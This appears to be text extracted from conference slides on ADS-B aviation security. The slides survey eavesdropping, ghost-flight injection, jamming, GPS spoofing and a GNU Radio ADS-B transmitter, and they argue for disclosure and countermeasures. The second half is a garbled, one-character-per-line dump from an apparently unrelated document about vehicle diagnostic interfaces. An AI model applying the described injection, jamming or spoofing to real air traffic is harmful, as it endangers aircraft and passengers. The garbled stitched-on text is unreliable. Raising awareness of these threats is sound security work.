● Balint Seeber, spench.net – SDR research
● USAF Major Donald L. McCallie – Graduate
research project
● Nick Foster – SDR and radio enthusiast
● No one has come up with solid security
answers in several years of research
Why This Matters
● Largely a N. America problem but being utilized
all over the world, adopted wider yearly
● UPS equipped all of their fleet
● ADS-B equipped planes are in the air over your
head right now
● The inevitable direction of ATC for the next
couple decades
● I fly a lot and want to get home from here safely
● A multitude of threat vectors to look at
ADS-B Out Threat #1
● Eavesdropping: Easily capture cleartext
data of air traffic
● Data mining potential; We know whats in
the air and when
● See the talk after mine: Busting the BARR:
Tracking “Untrackable” Private Aircraft for
Fun & Profit
● They will go more into it
ADS-B Out Threat #2
● Injection: Inject 'ghost' flights into ATC systems
● Documents that discuss fusing ADS-B with primary radar, also
discusses discontinuing primary radar
● Introduce slight variations in real flights
● Generally cause confusion at inopportune moments (weather,
Holidays, major travel hubs, Olympics)
● Create regular false flights, train the system (smugglers)
● Some documentation discussing Multilateration, nothing denoting
its manditory use
ADS-B Out Threat #3
● Jamming: Outright Jam ATC reception of ADS-B
signals
● Could be detected and DF'd quickly, but are
facilities available for that?
● Proper target location and timing could cause
mass chaos (London Olympics?)
● Co-ordinated jamming across many travel hubs?
Accidental or intentional?
● Simple frequency congestion already a problem,
no contention protocol
ADS-B In Threat #1
● Injection: Inject data into aircraft ADS-B In
displays
● Inject confusing, impossible, scary types of
traffic to illicit a response
● Introduce conflicting data between ATC and
cockpit displays
● Autopilot systems using ADS-B In data for
collision avoidance?
● Aircraft have no source for multilateration
ADS-B In Threat #2
● GPS Jamming: Block planes ability to use GPS
● North Korea currently jamming GPS along border
● UK tests found widespread use along highways
● Newark airport caused grief daily by truck
mounted jammer
● ~$20-30 on Dealextreme.com
● Easily tucked into baggage on a timer
● Removes ADS-B advantages
ADS-B In Threat #3
● GPS Spoofing: Introduce manipulated signal to
generate false lat/lon reading
● Aircraft location no longer reliable
● Best case, fall back to traditional navigation
● Worst case, remote steering of aircraft
● Iran may have used this technique to capture
US drone
● Already shown to be able to screw with US
drones recently (sub ~$1000)
ADS-B Unknown Threats
● Some threats are total unknowns. The ATC system is
huge and hard to parse from public docs
● What about injecting data for a flight on the west coast,
into a ground station on the east coast?
● Has anyone fuzzed a 747 or a control tower? Buffer
overflow at 36,000 feet?
● Look into Chris Roberts of One World Labs work on
embedded control systems on planes, ships, cars, etc.
Mix in ADS-B.....Scary stuff.
● Verification of ADS-B chip level code. Could be used
as a control channel?
ADS-B Threat Mitigations?
● You hope that the engineers, FAA, DHS, everyone
else looked at these threats
● FAA submitted ADS-B to NIST for Security
Certification, but.....
● “ the FAA specifically assessed the vulnerability risk
of ADS–B broadcast messages being used to target
air carrier aircraft. This assessment contains
Sensitive Security Information that is controlled
under 49 CFR parts 1 and 1520, and its content is
otherwise protected from public disclosure”
ADS-B Threat Mitigation
● It gets worse: “While the agency cannot
comment on the data in this study, it can confirm,
for the purpose of responding to the comments
in this rulemaking proceeding, that using ADS–B
data does not subject an aircraft to any
increased risk compared to the risk that is
experienced today” - Docket No. FAA–2007–29305;
Amdt. No.91–314
● What threats are those? Why not threats of
tomorrow? Why not threats we have'nt thought
of yet?
ADS-B Threat Mitigation
● Multilateration; time differential between signal
reciving stations
● Provides corellation that ADS-B data matches
signal source
● No indication this will be used everywhere
● What about if the data does'nt match?
● How does the ATC UI indicate a mismatch?
● Liability issues for ATC equipment vendors
ignoring data?
ADS-B Threats
● Basically reponse is; “Trust Us”
● Second time I ran across this excuse. Last time was
RFID passports (look how that turned out)
● I dont know about you, but I never trust anyone who says
'Trust Me”
● Not trying to spew FUD, but to raise awareness and
pressure to disclose more information about existing
threat mitigation technology
● Also want to see disclosure of procedures for 'weird crap'
● Hackers looking at ATC will get a response
ADS-B Threats
● A common response will be 'It's too expensive
for the common man”
● ~$20 USB TV tuner can be made into a
software defined radio and used to receive
ADS-B
● Helping Dragorn get cheap receivers working
on Kismet and ADS-B support (wardriving for
aircraft!)
ADS-B Threats
● Got word while in the air en route to Poland
● Nick Foster implemented ADS-B Out on Gnu
Radio
● A synthetic report generated and decoded by
the Gnuradio ADS-B receiver: (-1
0.0000000000) Type 17 subtype 05 (position
report) from abcdef at (37.123444,
-122.123439) (48.84 @ 154) at 30000ft
● Honeymoon is over, exploit #1 is here
ADS-B Out Gnu Radio
ADS-B Threats
● Nick Foster raised his game
● ADS-B In on Flightgear (OSS Flight sim) populates
sim envirnoment with real planes
● ADS-B data generated by your virtual plane, fed into
GNU radio and put out over the real air
● Your virtual world is now transmitting into the real
world.
● Output now pseudo-matches a real planes
behaviour
● Flightgear also has an intercept course feature
ADS-B Threats
● Plan is to release the software
● Need to run past the EFF first to make sure we
don't get shot, dissapeared, etc
● We have the capability to generate arbitrary
packets, anyone else could easily do this
● All testing was at 900Mhz ISM band
● Easy to adjust for UAT ADS-B for GA
● The next guys might not be so nice
Other Threats
● Autopilot integration of ADS-B
● Collision avoidance systems
● Tailored approach (ATC upload landing plan to
aircraft)
● Aircraft are huge, complex systems
● Reading on one system leads you to many
others
Future
● ADS-B will be mandatory by 2020
● Europe delaying till 2030
● Already in use in N. America, Europe, China, Australia
● Even if not in use at airports, equipped planes are flying
overhead
● Still time to develop countermeasures (don't turn off
primary radar!)
● If you have a 747 or similar and/or an air traffic control
tower that I can borrow for a while, please let me know
Suggested Reading
● https://federalregister.gov/a/2010-19809 - FAA
Rulemaking on ADS-B
● http://www.hsdl.org/?abstract&did=697737 -
USAF graduate research project on ADS-B
Vulnerabilities
● http://www.radartutorial.eu - Good overview of
radar tech and ADS-B format
●
http://www.oig.dot.gov/sites/dot/files/ADS-B_Oct%202010.pdf - OIG
report on other risks to ADS-B
Conclusion
● This is pretty scary to consider
● How many people want to take the bus home?
● We should all be working on finding and solving
problems like this
● If I can find this stuff, so can bad guys
● Significant investment has been made already
● I want to hear your comments and your ideas on
further threats and research. Lets work on this
together!
Thanks - Questions
Please Prove Me Wrong!
I will post responses if I am wrong!
Email: [email protected]
Twitter: @ihackedwhat
Website: www.renderlab.net | pdf |
!
"
#
$
%
"
&
'
$
(
%
'
%
"
)
*
)
&
#
"
#
+
*
,
)
#
'
#
)
&
-
%
.
#
'
'
,
"
&
.
*
)
&
#
"
*
"
/
/
&
*
0
"
#
1
)
&
.
$
2
#
)
#
.
#
(
1
3
4
5
%
0
#
*
(
#
+
)
5
%
6
$
%
"
6
)
)
#
7
2
#
8
%
.
)
&
1
)
#
$
2
#
-
&
/
%
.
#
'
$
(
%
)
%
+
2
%
%
*
"
/
#
$
%
"
*
.
.
%
1
1
)
#
)
5
%
"
%
)
9
#
2
:
%
/
%
(
%
.
)
2
#
"
&
.
/
%
-
&
.
%
1
&
"
*
"
*
,
)
#
'
#
;
&
(
%
3
4
5
%
&
"
)
%
2
+
*
.
%
)
#
-
%
5
&
.
(
%
/
%
-
&
.
%
1
9
&
(
(
;
%
$
2
&
'
*
2
&
(
<
)
5
2
#
,
0
5
)
5
%
1
)
*
"
/
*
2
/
/
&
*
0
"
#
1
)
&
.
.
#
"
=
"
%
.
)
#
2
>
)
5
#
,
0
5
.
#
'
'
,
"
&
.
*
)
&
#
"
9
&
(
(
;
%
1
,
$
$
#
2
)
%
/
)
5
2
#
,
0
5
*
(
(
;
,
1
1
%
1
>
"
#
)
#
"
(
<
/
&
*
0
"
#
1
)
&
.
;
,
1
1
%
1
3
!
.
.
%
1
1
)
#
-
%
5
&
.
(
%
/
%
-
&
.
%
1
9
&
(
(
&
"
.
(
,
/
%
'
#
"
&
)
#
2
&
"
0
*
"
/
/
&
*
0
"
#
1
)
&
.
1
*
1
9
%
(
(
*
1
2
%
$
2
#
0
2
*
'
'
&
"
0
*
"
/
%
"
5
*
"
.
%
/
.
#
"
)
2
#
(
#
+
)
5
%
&
2
#
$
%
2
*
)
&
#
"
3
?
@
A
B
C
D
B
C
E
F
G
H
I
J
K
H
I
L
M
N
O
N
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
[
Y
\
]
T
Z
Y
^
Y
_
`
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
a
N
O
N
O
N
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
fP
b
d
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
a
N
O
N
O
h
i
V
Z
T
V
j
W
Y
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
f
i
P
b
g
O
O
O
O
O
O
O
O
O
a
N
O
N
Oa
k
l
m
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
n
N
O
N
O
n
o
e
_
`
Z
e
W
W
Y
Z
p
Z
Y
V
q
Y
`
r
e
Z
s
f
o
p
q
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
n
N
O
h
l
e
t
`
r
V
Z
Y
u
V
`
V
X
T
_
s
u
Y
v
T
U
Y
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
w
N
O
h
O
N
l
Y
Z
T
V
W
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
w
N
O
h
O
h
P
V
Z
V
W
W
Y
W
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
w
N
O
h
Oa
x
P
k
m
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
y
N
Oa
z
V
Z
c
r
V
Z
Y
u
V
`
V
X
T
_
s
u
Y
v
T
U
Y
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
y
N
Oa
O
N
d
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
y
N
Oa
O
h
P
Z
e
{
Z
V
^
^
V
j
W
Y
z
V
Z
c
r
V
Z
Y
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
|
N
Oa
Oa
u
Y
v
Y
W
e
}
^
Y
_
`
~
e
V
Z
c
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
|
K
H
I
L
h
O
N
u
Y
v
T
U
Y
P
Z
e
`
e
U
e
W
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
|
h
O
N
O
N
l
e
t
`
r
V
Z
Y
u
V
`
V
X
T
_
s
u
Y
v
T
U
Y
Y
Z
_
Y
W
k
_
`
Y
Z
t
V
U
Y
O
O
O
O
O
O
O
O
|
h
O
N
O
h
m
~
u
m
v
Y
Z
l
`
Z
Y
V
^
P
Z
e
`
e
U
e
W
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
?
N
h
O
N
Oa
q
Y
`
r
e
Z
s
k
_
`
Y
Z
t
V
U
Y
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
¡
h
O
N
O
n
m
~
u
m
v
Y
Z
k
P
P
Z
e
`
e
U
e
W
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
¡
h
O
h
u
Z
T
v
Y
Z
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
N
h
O
h
O
N
Y
Z
_
Y
W
u
Z
T
v
Y
Z
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
N
h
O
h
O
h
u
Z
T
v
Y
Z
u
V
Y
^
e
_
f
e
`
`
e
c
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
N
h
Oa
X
T
j
Z
V
Z
T
Y
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
N
h
Oa
O
N
u
V
`
V
X
T
_
s
u
Y
U
e
c
Y
fW
T
j
e
j
c
h
¢
W
T
_
s
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
h
h
Oa
O
h
i
Y
Q
T
U
W
Y
k
c
Y
_
`
T
£
U
V
`
T
e
_
q
]
^
j
Y
Z
f
W
T
j
v
T
_
g
O
O
O
O
O
O
O
O
O
O
O
N
h
h
Oa
Oa
u
T
V
{
_
e
S
`
T
U
¤
Y
S
`
d
e
c
Y
S
fW
T
j
e
j
c
h
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
a
h
Oa
O
n
_
e
_
¢
e
j
c
}
Z
e
`
e
U
e
W
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
N
h
Oa
O
w
z
T
{
Q
X
Y
v
Y
W
p
}
}
W
T
U
V
`
T
e
_
¥
]
_
U
`
T
e
_
S
f
W
T
j
e
`
`
e
g
O
O
O
O
O
O
O
O
h
N
h
O
n
p
}
}
W
T
U
V
`
T
e
_
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
N
h
O
n
O
N
k
_
`
Y
Z
t
V
U
Y
o
e
_
£
{
]
Z
V
`
T
e
_
f
e
`
`
e
U
e
_
£
{
g
O
O
O
O
O
O
O
O
O
O
O
O
h
N
h
O
n
O
h
q
Y
`
r
e
Z
s
d
e
_
T
`
e
Z
f
e
`
`
e
c
]
^
}
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
N
h
O
n
Oa
q
Y
`
r
e
Z
s
l
U
V
_
_
Y
Z
fe
`
`
e
}
Z
e
j
Y
¦
e
`
`
e
^
V
}
¦
e
`
`
e
S
U
V
_
¦
g
O
O
O
O
h
h
h
O
n
O
n
q
Y
`
r
e
Z
s
§
¨
}
W
e
Z
V
`
T
e
_
¤
e
e
W
f
e
`
`
e
U
V
`
g
O
O
O
O
O
O
O
O
O
O
O
O
h
h
h
O
n
O
w
l
U
V
_
¤
e
e
W
fS
U
V
_
`
e
e
W
©
¨
S
U
V
_
`
e
e
W
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
h
h
O
n
Oª
m
`
`
e
d
V
_
_
fe
`
`
e
^
V
_
_
g
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
a
«
¬
®
J
L
¯
°
±
²
L
I
H
³
L
G
H
I
J
K
H
I
L
´
µ
µ
I
¶
~
O
N
l
]
}
}
e
Z
`
Y
c
u
Y
v
T
U
Y
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
w
~
Oh
·
_
S
]
}
}
e
Z
`
Y
c
u
Y
v
T
U
Y
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
w
¸
¹
I
³
¯
´
µ
µ
I
¶
o
O
N
l
]
}
}
e
Z
`
Y
c
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
ª
o
Oh
l
]
}
}
e
Z
`
T
_
u
Y
v
Y
W
e
}
^
Y
_
`
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
ª
o
O
a
·
_
S
]
}
}
e
Z
`
Y
c
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
ª
º
»
E
C
A
¼
½
¾
¿
À
D
E
N
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
O
O
O
O
O
O
O
O
O
O
O
O
O
O
n
h
i
V
Z
T
V
j
W
Y
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
O
O
O
O
O
O
O
O
O
n
a
k
l
m
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
n
n
o
e
_
`
Z
e
W
W
Y
Z
p
Z
Y
V
q
Y
`
r
e
Z
s
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
O
O
O
O
O
O
O
O
O
O
O
O
O
O
w
w
l
Y
Z
T
V
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
O
O
O
O
O
O
O
O
O
O
O
O
ª
ª
l
Y
Z
T
V
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
O
O
O
O
O
O
O
O
O
O
O
O
ª
y
P
V
Z
V
W
W
Y
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
O
O
O
O
O
O
O
O
O
O
O
y
|
u
V
`
V
P
V
U
s
Y
`
¥
e
Z
^
V
`
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
P
]
W
S
Y
o
e
_
£
{
]
Z
V
`
T
e
_
k
u
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
¡
m
~
u
m
v
Y
Z
l
`
Z
Y
V
^
o
e
_
`
Z
e
W
o
Q
V
Z
V
U
`
Y
Z
S
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
¡
N
N
u
Y
U
e
c
Y
c
i
k
q
u
V
`
V
¤
R
}
Y
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
N
a
N
h
u
¤
o
u
V
`
V
j
V
S
Y
l
U
Q
Y
^
V
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
O
h
N
h
@
A
Á
Â
Ã
»
Ä
Å
C
o
e
}
R
Z
T
{
Q
`
fU
g
N
¢
h
¡
¡
n
u
V
Z
T
]
S
[
V
c
¤
Q
T
S
£
W
Y
T
S
}
V
Z
`
e
t
`
Q
Y
m
}
Y
_
m
`
`
e
}
Z
e
Æ
Y
U
`
O
m
}
Y
_
m
`
`
e
T
S
t
Z
Y
Y
S
e
t
`
r
V
Z
Y
Ç
R
e
]
U
V
_
Z
Y
c
T
S
`
Z
T
j
]
`
Y
T
`
V
_
c
©
e
Z
^
e
c
T
t
R
T
`
]
_
c
Y
Z
`
Q
Y
`
Y
Z
^
S
e
t
`
Q
Y
x
q
·
x
Y
_
Y
Z
V
W
P
]
j
W
T
U
X
T
U
Y
_
S
Y
V
S
}
]
j
W
T
S
Q
Y
c
j
R
`
Q
Y
¥
Z
Y
Y
l
e
t
`
r
V
Z
Y
¥
e
]
_
c
V
`
T
e
_
Ç
Y
T
`
Q
Y
Z
v
Y
Z
S
T
e
_
h
e
t
`
Q
Y
X
T
U
Y
_
S
Y
È
e
Z
fV
`
R
e
]
Z
e
}
`
T
e
_
g
V
_
R
W
V
`
Y
Z
v
Y
Z
S
T
e
_
O
É
Ê
Ë
Ì
Í
Î
Ï
Ð
Ñ
Ò
Ó
Ï
Ò
Ô
Î
Ó
Õ
Ö
×
Ø
Ù
Ú
Û
Õ
Û
Ü
Ü
Ý
Ý
Þ
ß
Ý
à
ß
Ý
á
Ý
Ü
Ì
â
Þ
Ì
Û
Þ
Í
Ö
ã
Ð
Í
ä
Ø
ã
É
å
A
Ã
D
æ
A
Ã
ç
•
`
e
c
e
è
e
`
Q
Y
Z
`
Q
T
_
{
S
T
_
t
e
Z
r
V
Z
c
¦
∗
Q
T
S
`
e
Z
R
∗
V
U
s
_
e
r
W
Y
c
{
Y
^
Y
_
`
S
é
ê
¾
Ã
ç
æ
¾
Ã
D
k
_
`
Y
Z
t
V
U
Y
j
Y
`
r
Y
Y
_
`
Q
Y
U
e
^
}
]
`
Y
Z
V
_
c
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
O
o
Y
Z
`
V
T
_
c
Y
¢
v
T
U
Y
S
V
Z
Y
Z
Y
S
`
Z
T
U
`
Y
c
`
e
U
Y
Z
`
V
T
_
c
V
`
V
W
T
_
s
W
V
R
Y
Z
S
V
_
c
©
e
Z
U
Y
Z
`
V
T
_
S
]
j
S
Y
`
S
e
t
}
Z
e
`
e
U
e
W
S
È
^
Y
S
S
V
{
Y
S
È
V
_
c
V
c
c
Z
Y
S
S
Y
S
O
z
V
Z
c
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
V
_
c
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
V
Z
Y
S
T
^
T
W
V
Z
Ç
`
Q
Y
^
V
Æ
e
Z
c
T
ë
Y
Z
Y
_
U
Y
T
S
`
Q
V
`
T
_
Q
V
Z
c
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
`
Q
Y
S
e
t
`
r
V
Z
Y
`
Q
V
`
c
Y
U
e
c
Y
S
`
Q
Y
c
V
`
V
W
T
_
s
T
S
Y
^
j
Y
c
c
Y
c
T
_
`
Q
Y
c
Y
v
T
U
Y
V
_
c
{
Y
_
Y
Z
V
W
W
R
Z
Y
t
Y
Z
Z
Y
c
`
e
V
S
£
Z
^
r
V
Z
Y
O
k
_
V
W
W
c
Y
v
T
U
Y
S
Y
¨
U
Y
}
`
t
e
Z
`
Q
Y
P
Z
e
{
Z
V
^
^
V
j
W
Y
X
e
{
T
U
j
V
S
Y
c
c
Y
v
T
U
Y
S
È
`
Q
Y
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
T
S
}
Y
Z
t
e
Z
^
Y
c
T
_
S
e
t
`
r
V
Z
Y
e
_
V
^
T
U
Z
e
}
Z
e
U
Y
S
S
e
Z
O
ì
í
ì
î
ï
ð
ñ
ò
ó
ô
õ
ö
ô
ð
÷
ø
ù
÷
ú
û
ò
ø
÷
ü
÷
ý
þ
ñ
P
Z
e
v
T
c
Y
T
_
`
Y
Z
t
V
U
Y
j
Y
`
r
Y
Y
_
o
d
m
l
©
¤
¤
X
W
Y
v
Y
W
S
T
{
_
V
W
S
V
_
c
j
]
S
W
Y
v
Y
W
S
T
{
_
V
W
S
O
b
Q
Y
Z
Y
V
}
}
W
T
U
V
j
W
Y
j
V
S
Y
c
e
_
`
Q
Y
j
]
S
`
R
}
Y
È
}
Z
e
v
T
c
Y
`
Y
Z
^
T
_
V
`
T
e
_
È
c
T
ë
Y
Z
Y
_
`
T
V
W
S
T
{
_
V
W
W
T
_
{
È
V
_
c
Q
V
W
t
c
]
}
W
Y
¨
T
_
`
Y
Z
t
V
U
Y
O
F
ÿ
F
ÿ
F
¹
´
¯
L
J
®
J
´
¯
H
²
¹
®
¤
Q
Y
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
fP
b
d
g
j
]
S
`
R
}
Y
T
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
N
|
w
¡
O
F
ÿ
F
ÿ
H
I
H
¯
L
¹
´
¯
L
J
®
J
´
¯
H
²
¹
¤
Q
Y
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
fP
b
d
g
j
]
S
`
R
}
Y
T
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
N
|
w
¡
O
a
~
T
`
§
_
U
e
c
T
_
{
}
]
W
S
Y
r
T
c
`
Q
^
e
c
]
W
V
`
T
e
_
u
Z
T
v
Y
¤
R
}
Y
c
T
ë
Y
Z
Y
_
`
T
V
W
v
e
W
`
V
{
Y
u
V
`
V
Z
V
`
Y
n
N
Oª
s
j
}
S
d
T
_
T
^
]
^
P
]
W
S
Y
b
T
c
`
Q
6µs
d
Y
c
T
V
c
]
V
W
r
T
Z
Y
m
]
`
}
]
`
X
e
r
i
e
W
`
V
{
Y
^
T
_
¡
i
È
^
V
¨
N
O
h
i
m
]
`
}
]
`
z
T
{
Q
i
e
W
`
V
{
Y
^
T
_
a
O|
i
È
^
V
¨
w
O
h
w
i
¤
V
j
W
Y
N
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
~
T
`
§
_
U
e
c
T
_
{
v
V
Z
T
V
j
W
Y
}
]
W
S
Y
r
T
c
`
Q
^
e
c
]
W
V
`
T
e
_
u
Z
T
v
Y
¤
R
}
Y
v
e
W
`
V
{
Y
u
V
`
V
[
V
`
Y
N
¡
O
n
s
j
}
S
d
T
_
T
^
]
^
P
]
W
S
Y
b
T
c
`
Q
34µs
d
Y
c
T
V
S
T
_
{
W
Y
r
T
Z
Y
m
]
`
}
]
`
X
e
r
i
e
W
`
V
{
Y
^
T
_
¡
i
È
^
V
¨
N
O
w
i
m
]
`
}
]
`
z
T
{
Q
i
e
W
`
V
{
Y
^
T
_
ª
O
h
w
i
È
^
V
¨
|
i
¤
V
j
W
Y
h
i
V
Z
T
V
j
W
Y
P
]
W
S
Y
b
T
c
`
Q
d
e
c
]
W
V
`
T
e
_
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
F
ÿ
F
ÿ
M
¬
¤
Q
Y
k
l
m
j
]
S
`
R
}
Y
T
S
S
}
Y
U
T
£
Y
c
T
_
k
l
m
N
n
N
¢
N
O
¤
Q
T
S
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
T
S
`
Q
Y
S
V
^
Y
V
S
`
Q
V
`
S
}
Y
U
T
£
Y
c
j
R
k
l
m
N
n
h
a
¡
¢
N
t
e
Z
v
Y
Q
T
U
W
Y
S
r
T
`
Q
V
N
h
i
Y
W
Y
U
`
Z
T
U
V
W
S
R
S
`
Y
^
O
¤
Q
Y
k
l
m
j
]
S
`
R
}
Y
Y
^
}
W
e
R
S
V
S
T
^
T
W
V
Z
S
T
{
_
V
W
W
T
_
{
S
U
Q
Y
^
Y
`
e
V
S
Y
Z
T
V
W
}
e
Z
`
V
S
S
}
Y
U
T
£
Y
c
T
_
¤
k
p
¢
h
a
h
O
b
T
`
Q
V
}
}
Z
e
}
Z
T
V
`
Y
v
e
W
`
V
{
Y
W
Y
v
Y
W
U
e
_
v
Y
Z
S
T
e
_
È
V
S
Y
Z
T
V
W
·
p
[
¤
^
V
R
j
Y
]
S
Y
c
`
e
U
e
^
^
]
_
T
U
V
`
Y
e
_
V
_
k
l
m
j
]
S
O
F
ÿ
F
ÿ°
¸
²
I
¯
¯
L
I
«
I
L
H
L
K
I
¸
«
¤
Q
Y
o
e
_
`
Z
e
W
W
Y
Z
p
Z
Y
V
q
Y
`
r
e
Z
s
f
o
p
q
g
j
]
S
`
R
}
Y
T
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
h
|
n
O
~
T
`
§
_
U
e
c
T
_
{
v
e
W
`
V
{
Y
W
Y
v
Y
W
u
Z
T
v
Y
¤
R
}
Y
v
e
W
`
V
{
Y
u
V
`
V
[
V
`
Y
N
¡
O
n
s
j
}
S
d
T
_
T
^
]
^
P
]
W
S
Y
b
T
c
`
Q
67µs
d
Y
c
T
V
S
T
_
{
W
Y
r
T
Z
Y
m
]
`
}
]
`
X
e
r
i
e
W
`
V
{
Y
^
T
_
¡
i
È
^
V
¨
h
O
n
i
m
]
`
}
]
`
z
T
{
Q
i
e
W
`
V
{
Y
^
T
_
Oª
i
È
^
V
¨
N
h
i
¤
V
j
W
Y
a
k
l
m
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
n
~
T
`
§
_
U
e
c
T
_
{
v
e
W
`
V
{
Y
W
Y
v
Y
W
u
Z
T
v
Y
¤
R
}
Y
c
T
ë
Y
Z
Y
_
`
T
V
W
v
e
W
`
V
{
Y
u
V
`
V
[
V
`
Y
w
¡
¡
s
j
}
S
d
T
_
T
^
]
^
P
]
W
S
Y
b
T
c
`
Q
N
¡
_
S
d
Y
c
T
V
c
]
V
W
r
T
Z
Y
m
]
`
}
]
`
X
e
r
i
e
W
`
V
{
Y
N
O
w
i
m
]
`
}
]
`
z
T
{
Q
i
e
W
`
V
{
Y
a
O
w
i
¤
V
j
W
Y
n
o
e
_
`
Z
e
W
W
Y
Z
p
Z
Y
V
q
Y
`
r
e
Z
s
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
ì
í
þ
ô
ø
÷
ô
þ
ô
ö
ò
ý
÷
ò
ó
÷
ñ
¤
Q
Y
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
}
Z
e
v
T
c
Y
W
T
`
`
W
Y
`
e
_
e
V
c
c
T
`
T
e
_
V
W
U
T
Z
U
]
T
`
Z
R
j
Y
R
e
_
c
W
e
{
T
U
U
e
_
v
Y
Z
S
T
e
_
O
p
W
W
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
T
S
c
e
_
Y
T
_
S
e
t
`
r
V
Z
Y
O
k
_
`
Q
Y
S
Y
c
Y
v
T
U
Y
S
È
`
Q
Y
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
T
_
`
Y
Z
t
V
U
Y
T
S
e
}
`
T
^
T
Y
c
S
e
`
Q
V
`
S
T
{
_
V
W
U
e
_
v
Y
Z
S
T
e
_
T
S
c
T
Z
Y
U
`
W
R
j
Y
`
r
Y
Y
_
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
j
]
S
V
_
c
`
Q
Y
U
e
^
}
]
`
Y
Z
j
]
S
È
T
_
S
`
Y
V
c
e
t
U
e
_
v
Y
Z
`
T
_
{
`
e
V
_
c
t
Z
e
^
